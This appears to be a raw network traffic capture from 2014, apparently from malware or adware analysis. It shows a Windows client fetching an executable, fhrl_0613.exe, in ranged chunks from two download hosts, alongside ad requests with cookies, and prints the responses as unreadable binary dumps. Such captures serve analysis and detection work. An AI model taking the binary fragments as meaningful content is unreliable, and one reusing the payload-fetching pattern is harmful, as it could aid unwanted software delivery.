>.............~/....<.<;...9%,...j=..-.....NHzZ..Ba.......*.=...Cv.,u....P|c....J...><.jy!..Jw.7.......4.*.3.d!U!..^i.8/.A...Blp..c........-~.B..W...7. tS9.})k.@>...s'..'c.....SEW=b[-5...0Y...mbr...(.m...~.._......t.'...%....j.~(e..N"..3/e......,..........l.s...EwK.,........`^..<n..W...._....?...3..!8.S.l."D....BoB`R}Z.....B..,..`i......F..B.....x..MQn...>...C3...;.[Y`
<<
<<< skipped >>>
GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=1433600-1638400
Host: dl2.fhrlw.com
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 1433600-1638400/2427616
Last-Modified: Fri, 13 Jun 2014 08:42:58 GMT
Accept-Ranges: bytes
ETag: "b50867ae386cf1:4b5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:15 GMT
.QvF2_.c.^a......9Bs..u.r....t.r.f.a:.c%!<.........I4b....uH!n.....Q<...i.....U..o.....R.....g....G.S....Kox.F2.e.PqR..e..W...E...Z.a.......k... .R...q..a4....y..-.. ..ir....R......i.7...9...G....g.M!j.O.....F.u1...K_.b..S.61..~.....O.w.-..'N.J.(y,..>........>...-.U.m. ...U...b,W......Q.}.k.}x..r...{......r[<...n...JKO.s..J?|.*.<./]xx.R.g.r...9.y...P.n....#f.b...vC..e..w.u.......H.cy)K.tl..@...b..F.H....7......o.9...Eb...xz.hm;.4.gict..ji....s..;.....A.O"....Yl.\s1/...Y....k.o.sZ@~.'.N..I.b..=..%a....%..........!.S$..p.C91t?..VO.).|.......vZ.....3.3.....rQW.v.......@...ywJU..T.....7_..~,.bA2.....W.i..H!..........T....m../Czz*Q.e......A.........!.fC........79.b.../....#....^.....{.:.'..vo..j...{.......>..e..Z..R5..<.UY...$R\....m%do....;..f...X....@.....-.O..)(z.|..jC..|. .bXL..k.O ..`.A..L...{.fIZ...V">d1........vU..kb.7....h.$d.@.E8mek.S...=4..%.suDN.-..}Kj.qn-/._..n..;}W...Z.X.16oPk.....pK. ...KK...<...../.$.qt.......7.."C...i.k .C../.e^.8...P}.p......s...."...B......M.......{...._.....c.j.A..*.g.*.....-{.......}......0.J.....@O.,.w.X.y<i...W........R8.TX.M}3.."..V..T..}..U..9.t%.z.......1.H..n/.5O..,..1..a..".y..t.=J.Y....,..c..=..q.Bxyb}8..I.u.[V....s...........)o......DFn,...j..g..r.kd....I.........cls.YN.....7...X.#......<E^.d..[.....>g;.......b..qS2..>z[.....|.)!...H.......0.D.*^M#TF..;.......i.#...w....Ddh.0jbS.xx.dp:...&9.=..7..2.:.L#.l....L.L...{..... ".$-..]...M.....I...v7....i..n.. .KH>.."...._.$)_.V.9..=...*.T"....Z<d..N...bR_.m.`f-e...6Jc.....Ok...5
<<
<<< skipped >>>
GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=1228800-1433600
Host: dl1.fhrlw.com
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 1228800-1433600/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:57 GMT
..fw.....H.rA. ^.wr(@.:?/[.......HO2Y[........s...jXQ~......66.B.r.....zO.....W9..\m.....D....u|BC0^....K....(.)E;....J(.B...krK....6..................W..4...e.j....q)M#$.~..B5...DS..0H....h:..,.S?.........4..tW...;.....q..<. ....%.=.mB...j..M^H......... ..C.....Y.`...`!..........%...X..j.H. !rOI3.......2...pO.}(....<g.^0.'Ch.O..d......12q.t..V.O<.......x.......WP..bW..cV..?l_X.^..0.1.&.... .B.9..@.B...k...............h" .mZ........,}9...j..J.....^.....xjU....#..l....%n|.....g......_UT2.{..........y..U7.......^'..X!....XH /.x....lJ.:..4..J...j..{N.G1.....K..6.O.'Z........r.YXY.j.<kK.'...[...SG..hw.,/..L.m=...T....$i....C.T..c!?.V)dU..3..62..1L...SE>V..4#......x......3.......R.'...v....2.?.^.s.Df........Sr..G..........C.Ad.-~.bS..!{V..g.,..:.....>.D.......o.J...z.&.(.......*..}V.......-...l$R..*|..Ja.n........j...."............)..../7...[..9..aEC.....Z...H."..........A........|..O{R............G).!-..../....#[?..I].=Y4A.W..s D-..qe.3.....#...C.nW..M..).V.8>;.0.".[:...IO.cI.z.."..u.C.l&..~Y..d.t.|[S.......(.m....F..i,....fB|.S..C7TQ<l...QQ._... .[$\{l....s:.c...3...".5......I;$..1J..u.U^~...#.....Td......z.TS......~rs.A!..1.R.u..o.r.l.q..$)...Y..~.PX......U..I(....4.....-.J.#.S.(0u.......If:....}.Q.4jT.h...qr.N=.|}./.}..k@C6. ...........e..p.......9...J.T..3.Lv.....L.x...9.....~Mh>k .BW...f..L.0V.H....|.....U.....Th*..<q.../.7C.L.& ......n}....{..?Qp.?.....s....\......1.....x.Z.......sy.x.Uogmg]t....'`.V..............gM..>.........<..k0.LN..T....9.^.V..#V..m.....kX.........V4Zz
<<
<<< skipped >>>
GET /app/a/53/48aaf3d6-f95f-4921-8a68-2606aed69a12.gif HTTP/1.1
Accept: */*
Referer: hXXp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736454&t1=0&bi=3&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736453&z=1872c1e9649eade9&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NV9wcmV0dHkgZG9nXzM0MTI2OQA-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img04.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Sat, 14 Jun 2014 09:00:48 GMT
Content-Type: image/jpeg
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
ETag: 9023c15c2b74fd70a034d1b373a42e09
Expires: Mon, 14 Jul 2014 01:04:57 GMT
Cache-Control: max-age=2592000
Last-Modified: Sat, 14 Jun 2014 01:04:57 GMT
90bc...PNG........IHDR.......<.....d\.|....pHYs...u...u..>.....MiCCPPhotoshop ICC profile..x..SwX...>..e.VB....l.."#....Y....a...@....V....HU....H....(.gA..Z.U\8.....}z............y.....&...j.9R.<:...OH......H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>..................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0...._p..H.......K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l.....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0..>.3.o..~..@...z..q.@......qanv.R....B1n..#......)..4.\,...X..P"M.y.R.D!......2......w....O.N....l.~.....X.v.@~.-......g42y.......@ ...........\...L....D..*.A..............a.D@.$.<.B........A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ...Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@.......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$....N.!%.2I.IkH.H-.S.>..i.L&..m....... ......O.......:...L..$R...J5e?....2B...Q.......:.ZIm.vP/S...4u.%...C..-....igi.h/.t.....E....k.......w......Hb(.k.{...../.L......T0.2..g...oUX*.*|.....:.V.~...TUsU?.y..T.U..^V}.FU.P.........U..6..RwR.P.Q_.._...c....F..H.Tc....!..2e.XB.rV..,k.Mb[...Lv...v/{LSCs.f.f.f..q.......9..J.!...{-.-?-..j.f.~.7.z...b.r......up.@.,..:m:.u..6.Q....u..>.c.y.........G.m..........704.6..l18c...c.k.i........h...h..I.'.&..g.5x.>f.o.b.4.e.k<abi2.......)..k.f....t...,.......9..k.a........E..J.6.....|...M..
<<
<<< skipped >>>
GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=1433600-1638400
Host: dl1.fhrlw.com
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 1433600-1638400/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:10 GMT
.QvF2_.c.^a......9Bs..u.r....t.r.f.a:.c%!<.........I4b....uH!n.....Q<...i.....U..o.....R.....g....G.S....Kox.F2.e.PqR..e..W...E...Z.a.......k... .R...q..a4....y..-.. ..ir....R......i.7...9...G....g.M!j.O.....F.u1...K_.b..S.61..~.....O.w.-..'N.J.(y,..>........>...-.U.m. ...U...b,W......Q.}.k.}x..r...{......r[<...n...JKO.s..J?|.*.<./]xx.R.g.r...9.y...P.n....#f.b...vC..e..w.u.......H.cy)K.tl..@...b..F.H....7......o.9...Eb...xz.hm;.4.gict..ji....s..;.....A.O"....Yl.\s1/...Y....k.o.sZ@~.'.N..I.b..=..%a....%..........!.S$..p.C91t?..VO.).|.......vZ.....3.3.....rQW.v.......@...ywJU..T.....7_..~,.bA2.....W.i..H!..........T....m../Czz*Q.e......A.........!.fC........79.b.../....#....^.....{.:.'..vo..j...{.......>..e..Z..R5..<.UY...$R\....m%do....;..f...X....@.....-.O..)(z.|..jC..|. .bXL..k.O ..`.A..L...{.fIZ...V">d1........vU..kb.7....h.$d.@.E8mek.S...=4..%.suDN.-..}Kj.qn-/._..n..;}W...Z.X.16oPk.....pK. ...KK...<...../.$.qt.......7.."C...i.k .C../.e^.8...P}.p......s...."...B......M.......{...._.....c.j.A..*.g.*.....-{.......}......0.J.....@O.,.w.X.y<i...W........R8.TX.M}3.."..V..T..}..U..9.t%.z.......1.H..n/.5O..,..1..a..".y..t.=J.Y....,..c..=..q.Bxyb}8..I.u.[V....s...........)o......DFn,...j..g..r.kd....I.........cls.YN.....7...X.#......<E^.d..[.....>g;.......b..qS2..>z[.....|.)!...H.......0.D.*^M#TF..;.......i.#...w....Ddh.0jbS.xx.dp:...&9.=..7..2.:.L#.l....L.L...{..... ".$-..]...M.....I...v7....i..n.. .KH>.."...._.$)_.V.9..=...*.T"....Z<d..N...bR_.m.`f-e...6Jc.....Ok...5
<<
<<< skipped >>>
GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=1433600-1638400
Host: dl1.fhrlw.com
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 1433600-1638400/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:10 GMT
.QvF2_.c.^a......9Bs..u.r....t.r.f.a:.c%!<.........I4b....uH!n.....Q<...i.....U..o.....R.....g....G.S....Kox.F2.e.PqR..e..W...E...Z.a.......k... .R...q..a4....y..-.. ..ir....R......i.7...9...G....g.M!j.O.....F.u1...K_.b..S.61..~.....O.w.-..'N.J.(y,..>........>...-.U.m. ...U...b,W......Q.}.k.}x..r...{......r[<...n...JKO.s..J?|.*.<./]xx.R.g.r...9.y...P.n....#f.b...vC..e..w.u.......H.cy)K.tl..@...b..F.H....7......o.9...Eb...xz.hm;.4.gict..ji....s..;.....A.O"....Yl.\s1/...Y....k.o.sZ@~.'.N..I.b..=..%a....%..........!.S$..p.C91t?..VO.).|.......vZ.....3.3.....rQW.v.......@...ywJU..T.....7_..~,.bA2.....W.i..H!..........T....m../Czz*Q.e......A.........!.fC........79.b.../....#....^.....{.:.'..vo..j...{.......>..e..Z..R5..<.UY...$R\....m%do....;..f...X....@.....-.O..)(z.|..jC..|. .bXL..k.O ..`.A..L...{.fIZ...V">d1........vU..kb.7....h.$d.@.E8mek.S...=4..%.suDN.-..}Kj.qn-/._..n..;}W...Z.X.16oPk.....pK. ...KK...<...../.$.qt.......7.."C...i.k .C../.e^.8...P}.p......s...."...B......M.......{...._.....c.j.A..*.g.*.....-{.......}......0.J.....@O.,.w.X.y<i...W........R8.TX.M}3.."..V..T..}..U..9.t%.z.......1.H..n/.5O..,..1..a..".y..t.=J.Y....,..c..=..q.Bxyb}8..I.u.[V....s...........)o......DFn,...j..g..r.kd....I.........cls.YN.....7...X.#......<E^.d..[.....>g;.......b..qS2..>z[.....|.)!...H.......0.D.*^M#TF..;.......i.#...w....Ddh.0jbS.xx.dp:...&9.=..7..2.:.L#.l....L.L...{..... ".$-..]...M.....I...v7....i..n.. .KH>.."...._.$)_.V.9..=...*.T"....Z<d..N...bR_.m.`f-e...6Jc.....Ok...5
<<
<<< skipped >>>
GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=2048000-2252800
Host: dl1.fhrlw.com
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 2048000-2252800/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:06 GMT
....`..m.R.@......H.8=H$.......b.".....'...6..B....E..,..S..E...r.0hns.9...t.(........!<....o....^y g.{G'......#........&;.60CD(.8......P..n...w.\........W.o... q..O.k.4T)V.....-.......X. ...H...0...(..,.vq6.r.Y...w".bF.).....-..`%...17c..U`...v.O..D...!..U..2e..........p.~j.Ck@.Q..7%.....$t5...`..A..?.,..M#.....E.....l.....yP....$...x.%..G...@U..74W...W.@..l..&.....r. .6.....TLZ.....rh......=|1.....,..J......w.........4..M.9N.\.E~=....baX.N.G.x.[...7..E.q?NmFT&..../A|U.$.....u.g&..iC...m......3......s.(R.h6.T..\g......;.w.....^....LvU.K.........4.......U*_'3..O..K.MF..L....F.w.........PNG........IHDR...1...0.....7.......pHYs................MiCCPPhotoshop ICC profile..x..SwX...>..e.VB....l.."#....Y....a...@....V....HU....H....(.gA..Z.U\8.....}z............y.....&...j.9R.<:...OH......H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>..................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0...._p..H.......K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l.....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0..>.3.o..~..@...z..q.@......qanv.R....B1n..#......)..4.\,...X..P"M.y.R.D!......2......w....O.N....l.~.....X.v.@~.-......g42y.......@ ...........\...L....D..*.A..............a.D@.$.<.B........A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ...Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@.......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#..
<<
<<< skipped >>>
GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=409600-614400
Host: dl2.fhrlw.com
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 409600-614400/2427616
Last-Modified: Fri, 13 Jun 2014 08:42:58 GMT
Accept-Ranges: bytes
ETag: "b50867ae386cf1:4b5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:03 GMT
...3k......}H.FO.......<_...*M.hr@.a$>..!...&p...H........>|N.......R...,.6d....X}....).p?E.|v.d.-.b,.`.y)......B\.}Z......E&.|..x.Jl4....Fro.eR..0...a..nXU..^Ax.T. ..d.V...........=~...&...........kq.......O....O...,Hx...._@.T:.o8d.pY.......1......B../.m.Tn.T[..S.w..b..Pw"..b...../..2.oY...^.......`3....tN(.v.. .K,..C',\.S@f..<.'...h..Xz.I...`..B]f../.'ixtr...X.h...fZ..8.......)M.T.W~O.....{...9............H....Q....4h...nl'P.y.............L'_%...K.][...Ve.W........d(...1.v..u8....F...2."%.t..2....;2.\lmt..w@..h. ...N .... .q....O..Z..r.s.A..$....n..E|.l..(.mTR...p...N....G.|H=...V.xzc...n.*.._....-c.*.g.gF.X.m...@M..E".':N..Xc.=r.z.k... #...C...6.*..p..[...i.\.bQ.!...z!...K1U(@ ......0?BS.d/j...Z...b.]ph..,#..lZ...*..[c.y.....T.Y.`1...V4#.~...1*$lD....K(U{%0.."q........L......{m.Fe.r{5..._{*B.F...^.........s...9\.,.MD6UkL..H7..B= . .u.F..Sp..k......he..$..O;6.8..i.d$Fqz.#........y..u.;u..wkJG4sN^].....?.... ....y.}.....(..7.. L.s.!XJ3?}........h.`.?..]...X.^t*.M....?.. (K......dL.A... EZi.....XFTZHb....C...0g.q&.El.....9..!~..yd.sDO.........h..N.gK..|-..<.i.9.s..2.....g..8..........qx6....../.o...Y.]E..G.*a..d.#...}.AW.../.m.l.G.G.B-..!k.UX......O...*(.&.n...2.>....]...q..vp.J=M| INT..xN....O..e..%l....-w.sF].Y..~..W....{.B...i.p.....R<.....;.F.u..........1X ..v&V.....20.M.q.. w...8@. ........_........ggZ_......[-..K^B_.N.9t.g.v.....nK&."=....~,.0.M.^.r.... ..5\j....uC8.<...[..&...n....0..9.2...#..z.n...D.9.y? ....'o.]|......:.......U J..g...=...MC...Ul...3.......8...i.......-v.rBI..?.
<<
<<< skipped >>>
GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=2252800-2457600
Host: dl1.fhrlw.com
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Content-Length: 174816
Content-Type: application/octet-stream
Content-Range: bytes 2252800-2427615/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:14 GMT
...*.....]G.......C._2u.....[.Kcf..k.....4......oZ............I.H....F.. .%.$....=;..=....D...@}A}$.k..L&.IQ2.....j.q.*.X.........Z8R.f...h?..t..1.f.|A...o..@...M.......k#.~..N..4.9`.x.>.l".q.........x.8...{Ze>=!s.....}./...$\9<L.p_.n..0.d....8%Y6...@.9...!"UU...6..p'.....D..H.T'...q;.c..$_D.......}...w..8...~34V*6.in./.0}.....CP........db.......I....B..\x*.[:.dF..VY....$"..b.".\4..1@...30....&w......S..\.....TL..v.n......b...8. T...XQ...%mk.T..h.....0...<h...)_....N...9.......{9j.....u..W.......5......V.j.n.'.%.......T...x.McY..VS....D..G..OL...:....X..(...f..f.I...(".s'..<.uk...{1. TO...7...^y.....].._@...I-_.../.F..a}..N.3...~...N..yw.....^..n.k1Xx.{.Z..'.......7.8.....I.%.b...n....X;....j.X$D..}....j6..)..@..b.............?F..^...!.....*.w.T@m..... &5L.~.-e.;.q...;.n"h.OD..t..].Fke.f.]...........[G.?..i..Y.>. ....oZ...........s.jg...&.......i.".X.....Z..'..~N... ...d...$q.^<..S.3 ...,.]..Oh0..iC.%r..v...2.Y.fLN..B._..U.....,......I..k...,.....`y~....r...f..g%..V......>wM....).}:.....f.f.7.nWg7.G.I....r.......E.......)Z'9.o.c....."S.K..3M<,.w*^....E2...uIQ.K=..9..k....]p..9.a....7d.<.d#.`.k....k...;...=0.{\96b...(...|dmTk..`HkG$p..-}wH.A....#,.GhE.t...-I.$....0A;p.....Z/6d....O....>.%z.f.H.?........n...f.......S.rJ...U.I.=.l"..8<......Y..Q.....y...]r.M`VI..n.B.K.G.-..JX.<.i......Q......... ..Y{......T.X<..9....?^7s......D#Q.Z...'..!..e..S....iD....U}.....4....[V.x?.m.........>b.nRy....'8TXF.U.<....O.....Q8..g.%..P.Y...`.N...t.#.oh@.FiuA.........o...d=.qWD.7...x
<<
<<< skipped >>>
GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=2252800-2457600
Host: dl2.fhrlw.com
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Content-Length: 174816
Content-Type: application/octet-stream
Content-Range: bytes 2252800-2427615/2427616
Last-Modified: Fri, 13 Jun 2014 08:42:58 GMT
Accept-Ranges: bytes
ETag: "b50867ae386cf1:4b5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:29 GMT
...*.....]G.......C._2u.....[.Kcf..k.....4......oZ............I.H....F.. .%.$....=;..=....D...@}A}$.k..L&.IQ2.....j.q.*.X.........Z8R.f...h?..t..1.f.|A...o..@...M.......k#.~..N..4.9`.x.>.l".q.........x.8...{Ze>=!s.....}./...$\9<L.p_.n..0.d....8%Y6...@.9...!"UU...6..p'.....D..H.T'...q;.c..$_D.......}...w..8...~34V*6.in./.0}.....CP........db.......I....B..\x*.[:.dF..VY....$"..b.".\4..1@...30....&w......S..\.....TL..v.n......b...8. T...XQ...%mk.T..h.....0...<h...)_....N...9.......{9j.....u..W.......5......V.j.n.'.%.......T...x.McY..VS....D..G..OL...:....X..(...f..f.I...(".s'..<.uk...{1. TO...7...^y.....].._@...I-_.../.F..a}..N.3...~...N..yw.....^..n.k1Xx.{.Z..'.......7.8.....I.%.b...n....X;....j.X$D..}....j6..)..@..b.............?F..^...!.....*.w.T@m..... &5L.~.-e.;.q...;.n"h.OD..t..].Fke.f.]...........[G.?..i..Y.>. ....oZ...........s.jg...&.......i.".X.....Z..'..~N... ...d...$q.^<..S.3 ...,.]..Oh0..iC.%r..v...2.Y.fLN..B._..U.....,......I..k...,.....`y~....r...f..g%..V......>wM....).}:.....f.f.7.nWg7.G.I....r.......E.......)Z'9.o.c....."S.K..3M<,.w*^....E2...uIQ.K=..9..k....]p..9.a....7d.<.d#.`.k....k...;...=0.{\96b...(...|dmTk..`HkG$p..-}wH.A....#,.GhE.t...-I.$....0A;p.....Z/6d....O....>.%z.f.H.?........n...f.......S.rJ...U.I.=.l"..8<......Y..Q.....y...]r.M`VI..n.B.K.G.-..JX.<.i......Q......... ..Y{......T.X<..9....?^7s......D#Q.Z...'..!..e..S....iD....U}.....4....[V.x?.m.........>b.nRy....'8TXF.U.<....O.....Q8..g.%..P.Y...`.N...t.#.oh@.FiuA.........o...d=.qWD.7...x
<<
<<< skipped >>>
GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=819200-1024000
Host: dl1.fhrlw.com
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 819200-1024000/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:53 GMT
.qb.........d>...Kcp..)`.`.j..X3y4Ei3..|$7.....xN.-/.0:.;.U.........p......z......L.,.....|..=..3.....Cca^:..;.....'.])....!........%O.Y..M.DjK...8.[..QY.G............X.....:Gzc...tv...yu...,3k....Sc.(..hK...b..V..q..e...)./p..O....Q.h.......](....V.....L.T.F..\.8}..J.6SB.0.....U.R..z9`I...[....{.1.`cB.n.c7US...&s..N..Fl.%.?&..........Z....VCr..d.1 #=<.,.Ir.a.c......N..u%4..|m.I;R.}.......?..!!x....i&.3....X4a*........F.........W.h.U....Mv0In..^.........a...Q3...$..z..i..W...nVt...."p..$.......L.:.V..b...)..*.....\.@4..|....F... .....].?.6r...rF%a.c*>@*..vUp[..._.I...;.....]...>.N..I..f.....`.wcW..6..9Yp..#..!.l.k....d..........e..4..!.....n.X.tS.|.A.lW.].`k.6. ~3/6/.[h"w..8..U.#._......p....A...R.....g.6.-..Qrm..g.....4{.-.$...u?U....9......k...n....|.;E....(.>.1Z.\...f8l.n..u2..)....|...E....S.)(...#.....mX.HQ..z.......Qh-Z..)S).T...([...[{Z(..t.;.a.b...2..............Y..IK .........[guE........`|...[...............Z.x@.Z...AY..a.H>N..LKD...!..&jc..m....`...V3.hB....m...M...J....x..=ehO#.H..HC.._.?...N ...YwP.93.....,.R6..;...=...{C..m.y4...u.h.......>.{n.....c(...0...r.".KzpR..c.....0n.....7L^6.j...O....:.K>..!O..".K....x.c.....f.....w[.-....lO83.X.. ....P...)..v.C.......v..G.B.... ..........u.5.&....e....Z..y.OncN....!,aJ.{.....".....<3.;....Y..W......?...C!........c,.B.0...(s.x..B.Jb~.7....a.X.......MW.:.X%.y^.@Z..!$:.uG.".Q...`.^<.1.....|.uF...O..LazL...TUUY..<d.Q?q...E.y..n...N.%...!.*..a...n6./k.J.M./)....Lb......&U:o._.h..f.x..vL......fo=.{v@..Asxx7..^..$.:........?Z...
<<
<<< skipped >>>
GET /testgpimg/sogou_icon_short.png HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p.inte.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=KLpiSyllll2FXlDElllllVntR8ZlllllZYr1iZllllwlllllRklll5@@@@@@@@@@
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Sat, 14 Jun 2014 09:00:45 GMT
Content-Type: image/png
Content-Length: 3528
Connection: keep-alive
Last-Modified: Wed, 23 Jan 2013 07:16:05 GMT
Expires: Sat, 14 Jun 2014 12:44:54 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes
.PNG........IHDR.............2..5....pHYs................MiCCPPhotoshop ICC profile..x..SwX...>..e.VB....l.."#....Y....a...@....V....HU....H....(.gA..Z.U\8.....}z............y.....&...j.9R.<:...OH......H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>..................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0...._p..H.......K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l.....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0..>.3.o..~..@...z..q.@......qanv.R....B1n..#......)..4.\,...X..P"M.y.R.D!......2......w....O.N....l.~.....X.v.@~.-......g42y.......@ ...........\...L....D..*.A..............a.D@.$.<.B........A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ...Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@.......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$....N.!%.2I.IkH.H-.S.>..i.L&..m....... ......O.......:...L..$R...J5e?....2B...Q.......:.ZIm.vP/S...4u.%...C..-....igi.h/.t.....E....k.......w......Hb(.k.{...../.L......T0.2..g...oUX*.*|.....:.V.~...TUsU?.y..T.U..^V}.FU.P.........U..6..RwR.P.Q_.._...c....F..H.Tc....!..2e.XB.rV..,k.Mb[...Lv...v/{LSCs.f.f.f..q.......9..J.!...{-.-?-..j.f.~.7.z...b.r......up.@.,..:m:.u..6.Q....u..>.c.y.........G.m..........704.6..l18c...c.k.i........h...h..I.'.&..g.5x.>f.o.b.4.e.k<abi2.......)..k.f....t...,.......9..k.a........E..J.6.....|...M....V>VyV.V
<<
<<< skipped >>>
GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=1024000-1228800
Host: dl1.fhrlw.com
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 1024000-1228800/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:57 GMT
